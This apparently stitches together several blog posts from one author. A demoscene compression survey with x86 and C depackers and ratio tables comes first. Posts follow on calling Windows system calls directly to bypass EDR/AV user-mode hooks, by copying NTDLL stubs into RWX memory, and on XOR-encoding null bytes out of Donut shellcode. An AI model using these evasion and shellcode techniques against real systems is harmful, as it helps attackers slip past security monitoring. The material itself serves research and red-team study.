        add    eax, eax          ; c->w <<= 1
        jnz    exit_getbit       ; if(c->w == 0)
        lodsd                    ; x = *(uint32_t*)c->src;
        adc    eax, eax          ; c->w = (x << 1) | 1;
    exit_getbit:
        ret                      ; return x >> 31;
    init_getbit:
        pop    ebp               ; ebp = &get_bit
        mov    eax, 1 << 31      ; c->w = 1 << 31
        cdq                      ; ofs = -1
        movsb                    ; *out++ = *src++;
        xor    ecx, ecx          ; len = 0
        jmp    main_loop
    copy_byte:
        movsb                    ; *out++ = *c.src++;
        mov    cl, 2             ; len = 2
    main_loop:
        xor    ebx, ebx          ; res = 0
        
        ; while(out < end)
        cmp    edi, [esp+pushad_t._ebp]
        jnb    lzoma_exit
        
        ; for(;;) {
        call   ebp               ; cf = get_bit(&c);
        jnc    copy_byte         ; if(cf) break;
        
        ; unpack lz
        jecxz  skip_lz           ; if(len) {
        call   ebp               ;   cf = get_bit(&c);
    skip_lz:                     ; }
        ; carry?
        jnc    use_last_offset   ; if(cf) {
        mov    cl, 3+2           ;   len = 3, biased by 2 for the two sbb checks below
        pushad                   ;   
        ; total = out - (uint8_t*)outbuf
        sub    edi, [esp+32+pushad_t._edi] 
        ; top = (total <= 400000) ? 60 : 50;
        mov    cl, 50
        cmp    edi, 400000
        ja     skip_upd
        add    cl, 10
    skip_upd:
        xor    ebp, ebp          ; ofs = 0
        xor    edx, edx          ; x = 256
        inc    dh
        mov    bl, byte[esi]     ; res = *c.src++
        inc    esi
    find_loop:                   ; for(;;) {
        add    edx, edx          ;   x += x;
        ; if(x >= (total + top)) {
        push   edi               ; save total
        add    edi, ecx          ; edi = total + top
        cmp    edx, edi          ; cf = (x - (total + top)) 
        pop    edi               ; restore total
        jb     upd_len3          ; jump if x is < (total + top)
        
        sub    edx, edi          ; x -= total;
        cmp    ebx, edx          ; if(res >= x) {
        jb     upd_len2          ; jump if res < x
        
        ; cf = get_bit(&c);
        call   dword[esp+pushad_t._ebp]
        adc    ebx, ebx          ; res = (res << 1) + cf;
        sub    ebx, edx          ; res -= x;
        jmp    upd_len2
    upd_len3:
        ; magic?
        ; if(x & (0x002FFE00 << 1)) {
        test   edx, (0x002FFE00 << 1)
        jz     upd_len4
        
        ; top = (((top << 3) + top) >> 3);
        lea    ecx, [ecx+ecx*8]
        shr    ecx, 3
    upd_len4:
        cmp    ebx, ecx          ; if(res < top) break;
        jb     upd_len2
        
        sub    ebp, ecx          ; ofs -= top
        add    edi, ecx          ; total += top
        add    ecx, ecx          ; top <<= 1
        
        ; cf = get_bit(&c);
        call   dword[esp+pushad_t._ebp]
        
        ; res = (res << 1) + cf;
        adc    ebx, ebx
        jmp    find_loop
    upd_len2:
        ; ofs = (ofs + res + 1);
        lea    ebp, [ebp + ebx + 1]
    
        ; if(ofs >= 5400) len++;
        cmp    ebp, 5400
        sbb    dword[esp+pushad_t._ecx], 0
        
        ; if(ofs >= 0x060000) len++;
        cmp    ebp, 0x060000
        sbb    dword[esp+pushad_t._ecx], 0
        
        neg    ebp               ; ofs = -ofs;
        
        mov    [esp+pushad_t._edx], ebp ; save ofs in edx
        mov    [esp+pushad_t._esi], esi
        mov    [esp+pushad_t._eax], eax
        popad                    ; restore registers
    use_last_offset:
        call   ebp               ; if(get_bit(&c)) {
        jnc    check_two
        
        add    ecx, 2            ; len += 2
    upd_len:                     ; for(res=0;;res++) {
        call   ebp               ; cf = get_bit(&c);
        adc    ebx, ebx          ; res = (res << 1) + cf;
        
        call   ebp               ; if(!get_bit(&c)) break;
        jnc    upd_lenx
        
        inc    ebx               ; res++;
        jmp    upd_len
    upd_lenx:
        add    ecx, ebx          ; len += res
        jmp    copy_bytes
    check_two:                   ; } else {
        call   ebp               ;   cf = get_bit();
        adc    ecx, ebx          ;   len += cf
    copy_bytes:                  ; }
        push   esi               ; save c.src pointer
        lea    esi, [edi + edx]  ; ptr = out + ofs
        dec    ecx
        ; while(--len) *out++ = *ptr++;
        rep    movsb
        pop    esi               ; restore c.src
        jmp    main_loop
    lzoma_exit:
        popad                    ; free()
        popad                    ; restore registers
        ret
    

    12.7 KKrunchy

    Designed by Fabian Giesen for the demo group Farbrausch, KKrunchy comprises two algorithms. The first, developed between 2003 and 2005, is an LZ77 variant with an arithmetic coder published in 2006. The second algorithm, developed between 2006 and 2008, borrows ideas from PAQ7 and was published in 2011. Both are slow at compression but acceptable for demo productions and are compact for decompression. Fabian describes both in more detail here, including the “secret ingredient” that can improve ratios of 64K intros by up to 10%. In 2011, Farbrausch members published source code for their demo productions made between 2001 and 2011, including both compressors. A 32-bit x86 decoder is already available from Fabian. There appears to be a buffer overflow in the compressor that goes unnoticed without AddressSanitizer. Here’s an alternate version of the simple depacker used as a reference.

    #if defined(__GNUC__)
    // gcc or clang, on any platform
    #define REV(x) __builtin_bswap32(x)
    #else
    // msvc
    #define REV(x) _byteswap_ulong(x)
    #endif
    
    typedef struct _fr_state {
        const uint8_t *src;
        // range decoder values
        uint32_t val, len, pbs[803];
    } fr_state;
    
    // decode a bit using range decoder
    static int DB(
      fr_state *s, int idx, uint32_t flag) 
    {
        uint32_t a, b, c, d, e;
    
        a = s->pbs[idx];
        b = (s->len >> 11) * a;
        c = (s->val >= b);
        d = -c; e = c-1;
        s->len = (d & s->len) | (e & b);
        a = (d & a) | (e & -a + 2048);
        a >>= (5 - flag);
        s->pbs[idx] += (a ^ d) + c;
        d &= b;
        s->val -= d; s->len -= d;
        a = (s->len >> 24);
        a = a == 0 ? -1 : 0;
        b = (a & 0xFF) & *s->src;
        d = -a;
        s->src += d;
        s->val = (s->val << (d << 3)) | b;
        s->len = (s->len << (d << 3));
        return c;
    }
    
    // decode tree
    static int DT(
      fr_state *s, int p, int bits) 
    {
        int c;
        
        for(c=1; c<bits;) {
          c = (c+c) + DB(s, p + c, bits==256);
        }
        return c - bits;
    }
    
    // decode gamma
    static int DG(fr_state *s, int flag) {
        int     v, x = 1;
        uint8_t c = 1;
        
        v = (-flag & (547 - 291)) + 291;
        
        do {
          c = (c+c) + DB(s, v+c, 0);
          x = (x+x) + DB(s, v+c, 0);
          c = (c+c) + (x & 1);
        } while(c & 2);
        
        return x;
    }
    
    uint32_t fr_depack(
      void *outbuf, 
      const void *inbuf) 
    {
        int      tmp, i, ofs, len, LWM;
        uint8_t  *ptr, *out = (uint8_t*)outbuf;
        fr_state s;
         
        s.src  = (const uint8_t*)inbuf;
        s.len  = ~0;
        s.val  = REV(*(uint32_t*)s.src);
        s.src += 4;
        
        for(i=0; i<803; i++) s.pbs[i] = 1024;
    
        for(;;) {
          LWM = 0;
          // decode literal
          *out++ = DT(&s, 35, 256);
        fr_read_bit:
          if(!DB(&s, LWM, 0)) continue;
          // decode match
          len = 0;
          // use previous offset?
          if(LWM || !DB(&s, 2, 0)) {
            ofs = DG(&s, 0);
            if(!ofs) break;
            
            len  = 2;
            ofs  = ((ofs - 2) << 4); 
            tmp  = ((ofs != 0 ? -1 : 0) & 16) + 3;
            ofs += DT(&s, tmp, 16) + 1;
            
            len -= (ofs < 2048);
            len -= (ofs < 96);
          }
          LWM  = 1;
          len += DG(&s, 1);
          ptr  = out - ofs;
          
          while(len--) *out++ = *ptr++;
          goto fr_read_bit;
        }
        return out - (uint8_t*)outbuf;
    }
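
    DB above is written without branches, which makes it hard to follow. As a reading aid, here’s a sketch of what should be the same logic using ordinary branches. The names rc_state and rc_decode_bit are made up for this example and are not part of Fabian’s code, and the sketch is not tuned for size.

```c
#include <assert.h>
#include <stdint.h>

// Illustrative copy of the decoder state (same fields as fr_state above).
typedef struct {
    const uint8_t *src;           // next input byte
    uint32_t val, len, pbs[803];  // code value, range, 11-bit probabilities
} rc_state;

// Decode one bit. A non-zero `fast` selects the quicker adaptation rate
// (shift of 4 instead of 5), which the depacker requests for literals.
int rc_decode_bit(rc_state *s, int idx, uint32_t fast) {
    uint32_t p, bound;
    int      bit;

    assert(idx >= 0 && idx < 803 && fast <= 1);

    p     = s->pbs[idx];
    bound = (s->len >> 11) * p;

    if (s->val < bound) {
        // bit 0: keep the lower part of the range, raise the probability
        s->len      = bound;
        s->pbs[idx] = p + ((2048 - p) >> (5 - fast));
        bit = 0;
    } else {
        // bit 1: keep the upper part of the range, lower the probability
        s->val     -= bound;
        s->len     -= bound;
        s->pbs[idx] = p - (p >> (5 - fast));
        bit = 1;
    }
    // renormalise: shift in one byte once the range drops below 2^24
    if ((s->len >> 24) == 0) {
        s->val = (s->val << 8) | *s->src++;
        s->len <<= 8;
    }
    return bit;
}
```

    One difference worth knowing: the branch-free DB reads *s->src on every call, even when no renormalisation happens, whereas this version only touches the input when it consumes a byte.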
    

    13. Results

    The following table, while ordered by ratio, is NOT a rank order and shouldn’t be interpreted that way. It wouldn’t be fair to judge the algorithms solely on my criteria: a lightweight decompressor, a high compression ratio and open source code. The ratios are based on compressing a 1MB PE file for Windows without any additional trickery.

    Algorithm   RAM (Bytes)   ROM (Bytes)                 Ratio
    LZ77        0             54                          32%
    ZX7 Mini    0             67                          36%
    LZSS        0             69                          40%
    LZ4         0             80                          43%
    ULZ         0             124                         44%
    LZE         0             97                          45%
    ZX7         0             81                          46%
    MegaLZ      0             117                         46%
    BriefLZ     0             92                          46%
    LZSA1       0             96                          46%
    LZSA2       0             187                         50%
    NRV2b       0             115                         51%
    LZOMA       0             238                         54%
    Shrinkler   4096          235                         55%
    KKrunchy    3212          639 (compiler generated)    55%
    LZMA        16384         1265 (compiler generated)   58%

    14. Summary

    One could surely write a book about compression algorithms used by the Demoscene, and it’s safe to say I’ve only scratched the surface of this subject. For example, there is no analysis of compression and decompression speed of implementations for the x86 or other architectures. My primary concern at the moment is the compression ratio and code size.

    15. Acknowledgements

    A number of people helped directly or indirectly with this post.

    • Tim Bell for LZB and information about the Stac Electronics lawsuit.
    • Blueberry for optimization tips and fixing my initial 68K translation of Shrinkler.
    • Qkumba for fixing x86 translation, translation of Exomizer and 6502 depackers.
    • Trixter for 8088 depackers.
    • Introspec for Z80 depackers and impressive knowledge of LZ variations.
    • Emmanuel Marty for aPUltra, LZSA, and helping with x86 decoder for aPLib.

    16. Further Research

    To save you time locating information about some of the topics discussed in this post, I’ve included some links to get you started.

    16.1 Documentaries and Interviews

    16.2 Websites, Blogs and Forums

    16.3 Demoscene Productions

    This is not a “best of” list or a list of my favorites. It’s mainly drawn from some YouTube recommendations, so please don’t take offense if I didn’t include your demo. Contact me if you feel I’ve missed any.

    16.4 Tools

    16.5 Other Compression Algorithms

    The following table, while ordered by ratio, is NOT a rank order and shouldn’t be interpreted that way. It wouldn’t be fair to judge the algorithms solely on my criteria, which are a lightweight decompressor, a high compression ratio and open source code. The compression ratios are from compressing a 1MB PE file for Windows.

    OK/Good (~25-39%)

    Library / API / Algorithm               Ratio  Link
    zpack                                   24%    https://github.com/zerkman/zpacker
    PPP                                     27%    https://tools.ietf.org/html/rfc1978
    JQCoding                                27%    https://encode.su/threads/2157-Looking-for-a-super-simple-decompressor?p=43099&viewfull=1#post43099
    LZJB                                    28%    https://github.com/nemequ/lzjb
    LZRW1                                   31%    http://ross.net/compression/lzrw1.html
    LZ48                                    31%    http://www.cpcwiki.eu/forum/programming/lz48-cruncherdecruncher/
    LZ77                                    32%    https://github.com/andyherbert/lz1
    LZW                                     33%    https://github.com/vapier/ncompress
    LZP1                                    34%    http://www.hugi.scene.org/online/coding/hugi%2012%20-%20colzp.htm
    Kitty                                   34%    https://encode.su/threads/2174-Kitty-file-compressor-(Super-small-compressor)
    LZ49                                    35%    http://www.cpcwiki.eu/forum/programming/lz48-cruncherdecruncher/
    LZ4X                                    36%    https://github.com/encode84/lz4x
    QuickLZ                                 36%    http://www.quicklz.com/
    ZX7mini                                 36%    https://github.com/antoniovillena/zx7mini
    RtlDecompressBuffer (LZNT1)             36%    Windows OS
    Decompress (Xpress)                     37%    Windows OS

    Very Good (40-49%)

    Library / API / Algorithm               Ratio  Link
    LZSS                                    40%    https://github.com/kieselsteini/lzss
    LZF                                     40%    https://encode.su/threads/1819-LZF-Optimized-LZF-compressor
    LZM                                     41%    https://github.com/r-lyeh/stdarc.c
    RtlDecompressBuffer (Xpress)            43%    Windows OS
    BLZ4                                    43%    https://github.com/jibsen/blz4
    LZ4Ultra                                43%    https://github.com/emmanuel-marty/lz4ultra
    ULZ                                     44%    https://github.com/encode84/ulz
    BitBuster                               44%    https://www.teambomba.net/bombaman/downloadd26a.html
    LZE                                     45%    http://gorry.haun.org/pw/?lze
    Decompress (Xpress Huffman)             45%    Windows OS
    ZX7                                     45%    http://www.worldofspectrum.org/infoseekid.cgi?id=0027996
    LZMAT                                   45%    http://www.matcode.com/lzmat.htm
    CRUSH                                   45%    https://sourceforge.net/projects/crush/
    Hrust                                   46%    https://github.com/specke/ohc
    MegaLZ                                  46%    http://os4depot.net/index.php?function=showfile&file=development/cross/megalz.lha
    LZSA1                                   46%    https://github.com/emmanuel-marty/lzsa
    BriefLZ                                 46%    https://github.com/jibsen/brieflz
    apUltra                                 47%    https://github.com/emmanuel-marty/apultra
    Pletter5                                47%    http://www.xl2s.tk/
    Pucrunch                                48%    https://github.com/mist64/pucrunch
    SR2                                     48%    http://mattmahoney.net/dc/#sr2

    Excellent (50%+)

    Library / API / Algorithm               Ratio  Link
    BCRUSH                                  50%    https://github.com/jibsen/bcrush
    LZSA2                                   50%    https://github.com/emmanuel-marty/lzsa
    RtlDecompressBufferEx (Xpress Huffman)  50%    Windows OS
    Decompress (MSZip)                      51%    Windows OS
    Exomizer                                51%    https://bitbucket.org/magli143/exomizer/wiki/Home
    aPLib                                   51%    http://ibsensoftware.com/products_aPLib.html
    JCALG1                                  52%    https://bitsum.com/portfolio/jcalg1/
    NRV2B                                   52%    http://www.oberhumer.com/opensource/ucl/
    BALZ                                    53%    https://sourceforge.net/projects/balz/
    Decompress (LZMS)                       54%    Windows OS
    LZOMA                                   54%    https://github.com/alef78/lzoma
    KKrunchy                                55%    https://github.com/farbrausch/fr_public
    Shrinkler                               55%    https://github.com/askeksa/Shrinkler
    NLZM                                    55%    https://github.com/nauful/NLZM
    BCM                                     55%    https://github.com/encode84/bcm
    D3DDecompressShaders (DXT/BC)           57%    Windows OS
    Packfire                                57%    http://neural.untergrund.net/
    LZMA                                    58%    https://www.7-zip.org/sdk.html
    PAQ8F                                   70%    http://mattmahoney.net/dc/paq.html

    Invoking System Calls and Windows Debugger Engine

    By: odzhan
    1 June 2020 at 15:00

    Introduction

    Quick post about Windows system calls, something I started working on after the release of Dumpert by Cn33liz last year and then forgot about. Dumpert is described in this post. Typically, EDR and AV set hooks on Win32 API or NT wrapper functions to detect and mitigate malicious activity. Dumpert attempts to bypass any user-level hooks by invoking system calls directly. It first queries the operating system version via RtlGetVersion and then selects the applicable code stubs to execute. SysWhispers generates header/ASM files by extracting the system call numbers from the code stubs in NTDLL.dll, and evilsocket also demonstrated how to do this many years ago. @FuzzySec and @TheWover have also implemented dynamic invocation of system calls after remapping NTDLL in Sharpsploit, which you can read about in their Bluehat presentation.

    Using system calls on Windows to interact with the kernel has always been problematic because the numbers assigned to each kernel function change between releases. Just after Cn33liz published Dumpert, I thought about how invocation might be improved without using assembly. There are lots of ways, but consider at least three for now. The first method, which is probably the simplest and safest, maps NTDLL.dll into executable memory and resolves the address of any system call via the Export Address Table (EAT) before executing. This is relatively simple to implement. The second approach maps NTDLL.dll into read-only memory and uses a disassembler, or at the very least a length disassembler, to extract the system call number. The third also maps NTDLL.dll into read-only memory, then copies the code stub to an executable buffer before invoking it. The length of the stub is read from the exception directory. Overcomplicated, perhaps. I did consider a few disassembly libraries for the second method, but just to save time settled on the Windows Debugger Engine, which has a built-in disassembler already.

    A PoC to inject a DLL into a remote process can be found here. It doesn’t use a disassembler, but because it uses the exception directory to locate the end of a system call, it will only work with 64-bit processes.

    Windows Debugging Engine

    Disassembling code via the engine requires a live process. Thankfully, it’s possible to attach the debugger to the local process in noninvasive mode. You could just map NTDLL into executable memory and invoke any system call from there; however, I wanted an excuse to use the debugging engine. 😛 lde.c, lde.h

    LDE::LDE() {
        CHAR path[MAX_PATH];
        
        ctrl = NULL;
        clnt = NULL;
        // GetProcAddress() tests this, so set it on every path
        mem  = NULL;
        // create a debugging client
        hr = DebugCreate(__uuidof(IDebugClient), (void**)&clnt);
        if(hr == S_OK) {
          // get the control interface
          hr = clnt->QueryInterface(__uuidof(IDebugControl3), (void**)&ctrl);
          if(hr == S_OK) {
            // attach to existing process
            hr = clnt->AttachProcess(NULL, 
              GetProcessId(GetCurrentProcess()), 
              DEBUG_ATTACH_NONINVASIVE | DEBUG_ATTACH_NONINVASIVE_NO_SUSPEND);
            if(hr == S_OK) {
              hr = ctrl->WaitForEvent(DEBUG_WAIT_DEFAULT, INFINITE);
            }
          }
        }
        ExpandEnvironmentStrings("%SystemRoot%\\system32\\NTDLL.dll", path, MAX_PATH);
        // open file
        file = CreateFile(path, 
          GENERIC_READ, FILE_SHARE_READ, NULL, 
          OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
          
        if(file == INVALID_HANDLE_VALUE) return;
        
        // map file
        map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, NULL);
        if(map == NULL) return;
        
        // create read only view of map
        // (last argument is a byte count; zero maps the whole file)
        mem = (LPBYTE)MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
    }
    

    WinDbg has a command to disassemble a complete function called uf (Unassemble Function). Internally, WinDbg builds a Control-flow Graph (CFG) to map the full function before displaying the disassembly of each code block. You can execute a command like uf via the Execute method and, so long as you’ve set up IDebugOutputCallbacks, capture the disassembly that way. I considered using a CFG to implement something similar to uf, which you can do if you wish. The system calls on my own build of Windows 10 have at most one branch, so I scrapped the idea of using a CFG or executing uf. With NTDLL mapped, you can use something like the following to resolve the address of an exported API.

    FARPROC LDE::GetProcAddress(LPCSTR lpProcName) {
        PIMAGE_DATA_DIRECTORY   dir;
        PIMAGE_EXPORT_DIRECTORY exp;
        DWORD                   rva, ofs, cnt;
        PCHAR                   str;
        PDWORD                  adr, sym;
        PWORD                   ord;
        
        if(mem == NULL || lpProcName == NULL) return NULL;
        
        // get pointer to image directories for NTDLL
        dir = Dirs();
        
        // no exports? exit
        rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if(rva == 0) return NULL;
        
        ofs = rva2ofs(rva);
        if(ofs == -1) return NULL;
        
        // no exported symbols? exit
        exp = (PIMAGE_EXPORT_DIRECTORY)(ofs + mem);
        cnt = exp->NumberOfNames;
        if(cnt == 0) return NULL;
        
        // read the array containing address of api names
        ofs = rva2ofs(exp->AddressOfNames);        
        if(ofs == -1) return NULL;
        sym = (PDWORD)(ofs + mem);
    
        // read the array containing address of api
        ofs = rva2ofs(exp->AddressOfFunctions);        
        if(ofs == -1) return NULL;
        adr = (PDWORD)(ofs + mem);
        
        // read the array containing list of ordinals
        ofs = rva2ofs(exp->AddressOfNameOrdinals);
        if(ofs == -1) return NULL;
        ord = (PWORD)(ofs + mem);
        
        // scan symbol array for api string
        do {
          str = (PCHAR)(rva2ofs(sym[cnt - 1]) + mem);
          // found it?
          if(lstrcmp(str, lpProcName) == 0) {
            // return the address
            return (FARPROC)(rva2ofs(adr[ord[cnt - 1]]) + mem);
          }
        } while (--cnt);
        return NULL;
    }
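
    The rva2ofs helper used above isn’t shown. It’s needed because the file is mapped as raw data rather than as a loaded image, so every RVA has to be translated to a file offset through the section table. The following is only a sketch of how such a helper might work. section_t is a hypothetical stand-in for the relevant IMAGE_SECTION_HEADER fields and rva_to_offset is a made-up name, so the real rva2ofs may well differ.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Hypothetical stand-in for the IMAGE_SECTION_HEADER fields that matter here.
typedef struct {
    uint32_t VirtualAddress;    // RVA of the section once loaded
    uint32_t SizeOfRawData;     // number of section bytes present in the file
    uint32_t PointerToRawData;  // file offset of the section
} section_t;

// Translate an RVA to a file offset.
// Returns (uint32_t)-1 when no section holds the RVA.
uint32_t rva_to_offset(const section_t *sec, size_t count, uint32_t rva) {
    size_t i;

    assert(sec != NULL || count == 0);

    for (i = 0; i < count; i++) {
        uint32_t start = sec[i].VirtualAddress;
        // only bytes that exist on disk can be read from the raw mapping
        if (rva >= start && rva - start < sec[i].SizeOfRawData) {
            return sec[i].PointerToRawData + (rva - start);
        }
    }
    return (uint32_t)-1;
}
```

    Returning (uint32_t)-1 on failure matches the way the callers above compare the result with -1.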
    

    The following will use the Disassemble method to show the code. You can also use it to inspect bytes if you wanted to extract the system call number. The beginning and end of the system call is read from the Exception directory.

    bool LDE::DisassembleSyscall(LPCSTR lpSyscallName) {
        ULONG64                       ofs, start=0, end=0, addr;
        PIMAGE_DOS_HEADER             dos;
        PIMAGE_NT_HEADERS             nt;
        PIMAGE_DATA_DIRECTORY         dir;
        PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
        DWORD                         i, rva;
        CHAR                          buf[LDE_MAX_STR];
        HRESULT                       hr;
        ULONG                         len;
        
        // resolve address of function in NTDLL
        addr = (ULONG64)GetProcAddress(lpSyscallName);
        if(addr == NULL) return false;
        
        // get pointer to image directories
        dir = Dirs();
        
        // no exception directory? exit
        rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
        if(rva == 0) return false;
        
        ofs = rva2ofs(rva);
        if(ofs == -1) return false;
        
        rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);
    
        // for each runtime function; the directory size bounds the table
        DWORD cnt = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].Size / sizeof(*rf);
        for(i=0; i<cnt; i++) {
          // is it our system call?
          start = rva2ofs(rf[i].BeginAddress) + (ULONG64)mem;
          if(start == addr) {
            // save end and exit search
            end = rva2ofs(rf[i].EndAddress) + (ULONG64)mem;
            break;
          }
        }
        
        if(start != 0 && end != 0) {
          while(start < end) {
            hr = ctrl->Disassemble(
              start, 0, buf, LDE_MAX_STR, &len, &start);
              
            if(hr != S_OK) break;
            
            printf("%s", buf);
          }
        }
        // report whether the system call was found
        return end != 0;
    }
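
    If all you want is the system call number, a full disassembler isn’t strictly required. The sketch below swaps the disassembler for a plain byte pattern match. It assumes an unhooked 64-bit stub that begins with mov r10, rcx followed by mov eax, imm32, and it simply gives up on anything else. syscall_number is a made-up name for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Read the system call number from the start of a 64-bit NTDLL stub.
// Expects: 4C 8B D1       mov r10, rcx
//          B8 xx xx xx xx mov eax, imm32
// Returns -1 if the bytes do not match (a hooked stub, for example).
int64_t syscall_number(const uint8_t *stub, size_t len) {
    assert(stub != NULL);

    if (len < 8) return -1;
    if (stub[0] != 0x4C || stub[1] != 0x8B ||
        stub[2] != 0xD1 || stub[3] != 0xB8) return -1;

    // imm32 is stored little-endian
    return (int64_t)((uint32_t)stub[4]       |
                     (uint32_t)stub[5] << 8  |
                     (uint32_t)stub[6] << 16 |
                     (uint32_t)stub[7] << 24);
}
```

    A -1 result is itself useful, since it suggests the bytes being inspected are not a pristine stub.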
    

    The following code will disassemble the system call.

    int main(int argc, char *argv[]) {
        LDE *lde;
        
        if(argc != 2) {
          printf("usage: dis <system call name>\n");
          return 0;
        }
        
        // create length disassembly engine
        lde = new LDE();
          
        lde->DisassembleSyscall(argv[1]);
    
        delete lde;
        
        return 0;
    }
    

    Just to illustrate, consider the disassembly of NtCreateThreadEx and NtWriteVirtualMemory. The address of SharedUserData doesn’t change, so the code requires no fixups just because it’s been mapped somewhere else.

    Invoking

    Simply copy the code for the system call to memory allocated by VirtualAlloc with PAGE_EXECUTE_READWRITE permissions. Rewriting the above code, we have something like the following.

    LPVOID LDE::GetSyscallStub(LPCSTR lpSyscallName) {
        ULONG64                       ofs, start=0, end=0, addr;
        PIMAGE_DOS_HEADER             dos;
        PIMAGE_NT_HEADERS             nt;
        PIMAGE_DATA_DIRECTORY         dir;
        PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
        DWORD                         i, rva;
        SIZE_T                        len;
        LPVOID                        cs = NULL;
        
        // resolve address of function in NTDLL
        addr = (ULONG64)GetProcAddress(lpSyscallName);
        if(addr == NULL) return NULL;
        
        // get pointer to image directories
        dir = Dirs();
        
        // no exception directory? exit
        rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
        if(rva == 0) return NULL;
        
        ofs = rva2ofs(rva);
        if(ofs == -1) return NULL;
        
        rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);
    
        // for each runtime function; the directory size bounds the table
        DWORD cnt = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].Size / sizeof(*rf);
        for(i=0; i<cnt; i++) {
          // is it our system call?
          start = rva2ofs(rf[i].BeginAddress) + (ULONG64)mem;
          if(start == addr) {
            // save the end and calculate length
            end = rva2ofs(rf[i].EndAddress) + (ULONG64)mem;
            len = (SIZE_T) (end - start);
            
            // allocate RWX memory
            cs = VirtualAlloc(NULL, len,  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if(cs != NULL) {
              // copy stub to memory
              CopyMemory(cs, (const void*)start, len);
            }
            break;
          }
        }
        // return pointer to code stub
        return cs;
    }
    

    Summary

    Invoking system calls via remapping of NTDLL.dll is of course the simplest approach. A lightweight LDE and CFG with no dependencies on external libraries would be useful for other Red Teaming activities like hooking APIs or even detecting hooked functions. It could also be used for locating GetProcAddress without touching the Export Address Table (EAT) or Import Address Table (IAT). However, GetSyscallStub demonstrates that you don’t need a disassembler just to read the code stub.

    Shellcode: Encoding Null Bytes Faster With Escape Sequences

    By: odzhan
    26 June 2020 at 09:00

    Introduction

    Quick post about a common problem removing null bytes in the loader generated by Donut. Replacing opcodes that contain null bytes with equivalent snippets is enough to solve the problem for a shellcode of no more than a few hundred bytes. It’s also possible to automate using encoders found in msfvenom and pwntools. However, the problem most users experience is when the loader generated by Donut is a few hundred kilobytes or even a few megabytes! This post demonstrates how to use escape sequences to facilitate faster encoding of null bytes. Maybe “escape codes” is a better description? You can find a PoC encoder here, which can be used to add an x86/AMD64 decoder to a shellcode generated by Donut.

    XOR Cipher

    Readers will be aware of the eXclusive-OR (XOR) cipher and its extensive use as a component or building block in many cryptographic primitives. It’s also a popular choice for obfuscating shellcode and specifically removing null bytes. In the past, the following code in C is what I’d probably use to find a suitable key. It will work with keys of any length, but is slow as hell for anything more than 24 bits.

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>
    #include <time.h>
    
    typedef uint8_t  u8;
    typedef uint32_t u32;
    
    int find_xor_key(
      const void *inbuf, u32 inlen, 
      void *outbuf, int outlen) 
    {
        u32      i;
        int      j, keylen=1;
        const u8 *in = (const u8*)inbuf;
        u8       *key = (u8*)outbuf;
        
        // initialize key to all zeros
        for(j=0; j<outlen; j++) key[j] = 0;
        
        // while keylen does not exceed max key requested
        while(keylen <= outlen) {
          // xor data with current key
          for(i=0; i<inlen; i++) {
            // if the result of xor is zero. end loop
            if((in[i] ^ key[i % keylen]) == 0) break;
          }
          // if we processed all data successfully
          if(i == inlen) {
            // return current key and its length
            return keylen;
          }
          // otherwise, update the key like a counter,
          // carrying only within the current key length
          for(j=0; j<keylen; j++) {
            if(++key[j]) break;
          }
          // every key of this length tried? grow the key
          if(j == keylen) keylen++;
        }
        // return nothing found
        return 0;
    }
    

    The following function can be used to test it and works relatively fast for something that’s compact, like 1KB, but sucks for anything > 3072 bytes, which I admit is unusual for shellcode.

    void test_key(void) {
        int i, keylen;
        u8  key[8], data[1024];
        
        srand(time(0));
        
        // fill buffer with pseudo-random bytes
        for(i=0; i<sizeof(data); i++) {
          data[i] = rand();
        }
        // try find a suitable XOR key for the data
        keylen = find_xor_key(data, sizeof(data), key, sizeof(key));
        
        printf("Suitable key %sfound.\n\n", 
          keylen ? "" : "could not be ");
        
        if(keylen) {
          printf("Key length : %i\nKey        : ", keylen);
          while(keylen--) {
            printf("%02x ", key[keylen]);
          }
          putchar('\n');
        }
    }
    

    find_xor_key() could be re-written to use multiple threads and this would speed up the search. You might even be able to use a GPU or cluster of computers, but the overall problem isn’t finding a key. We’re not trying to crack ciphertext. All we want to do is encode and later decode null bytes, and for the Donut loader, this approach is very inefficient.
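
    As an aside, the brute force in find_xor_key() isn’t the only way to get a key. A byte only becomes zero when it equals the key byte applied to it, so for a key of length L, key byte j just needs a value that never occurs at positions j, j+L, j+2L and so on. The sketch below builds a key that way in a single pass per length. find_xor_key_direct is a made-up name, and unlike the function above it never picks a zero key byte, on the assumption that the key itself must be free of null bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Returns the shortest key length (1..maxlen) for which a key without zero
// bytes exists that leaves no zero byte after XOR, or 0 if there is none.
// The key bytes are written to key[].
int find_xor_key_direct(const uint8_t *in, size_t inlen,
                        uint8_t *key, int maxlen)
{
    int    len, j, k;
    size_t i;

    assert(key != NULL);

    for (len = 1; len <= maxlen; len++) {
        for (j = 0; j < len; j++) {
            uint8_t seen[256];
            memset(seen, 0, sizeof(seen));
            // key[j] is only ever applied to bytes at j, j+len, j+2*len, ...
            for (i = (size_t)j; i < inlen; i += (size_t)len) seen[in[i]] = 1;
            // pick the smallest non-zero value missing from that slice
            k = 1;
            while (k < 256 && seen[k]) k++;
            if (k == 256) break;     // no usable byte, this length fails
            key[j] = (uint8_t)k;
        }
        if (j == len) return len;    // every position received a key byte
    }
    return 0;
}
```

    This doesn’t change the conclusion that follows: for a large loader, every slice tends to contain every byte value, so no short key exists regardless of how fast you search for one.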

    Encoding Algorithm

